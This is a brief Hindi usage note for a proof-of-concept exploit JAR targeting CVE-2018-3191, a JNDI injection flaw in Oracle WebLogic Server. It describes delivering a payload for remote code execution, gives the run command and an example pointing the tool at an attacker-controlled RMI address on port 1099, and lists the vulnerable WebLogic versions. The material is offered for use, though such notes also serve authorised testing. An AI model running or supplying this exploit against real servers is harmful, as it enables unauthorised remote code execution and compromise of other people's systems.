
CVE-2018-3191 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो JNDI इंजेक्शन के माध्यम से WebLogic Server को लक्ष्य करता है। Spring JNDI के माध्यम से रिमोट कोड एक्ज़ीक्यूशन ट्रिगर करने के लिए एक JAR पेलोड वितरित करता है।
उपयोग:
java -jar weblogic-spring-jndi.jar <jndi_address>
उदाहरण:
java -jar weblogic-spring-jndi.jar rmi://<IP>:1099/Object
नोट:
12.2.1.3
10.3.6.0
12.2.1.0
12.1.3.0
12.2.1.1